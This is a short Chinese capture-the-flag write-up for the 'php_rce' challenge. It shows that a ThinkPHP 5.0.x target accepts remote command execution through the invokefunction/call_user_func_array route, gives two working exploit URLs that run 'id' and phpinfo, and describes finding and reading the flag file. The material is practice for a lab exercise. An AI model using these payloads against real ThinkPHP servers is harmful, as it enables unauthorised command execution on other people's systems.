php_rce
进入后发现是一个php框架,根据题目php-rce远程命令执行,我们在github上一下这个版本有什么漏洞:
发现好几个版本,我们只知道5.0随便输入一个试一试,发下新有提示为5.0.2
payload
6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
(注意这里我们只复制thinkphp_5.0.21后面的,因为前面是靶场地址 )
发现可以进行远程命令执行:
ls查看目录没有什么可疑的
继续查看上级目录,最终在根目录下查到flag文件
用find命令查找与flag相关的
flag:
flag{thinkphp5_rce} flag{thinkphp5_rce}
更多推荐
攻防世界-php_rce详解
发布评论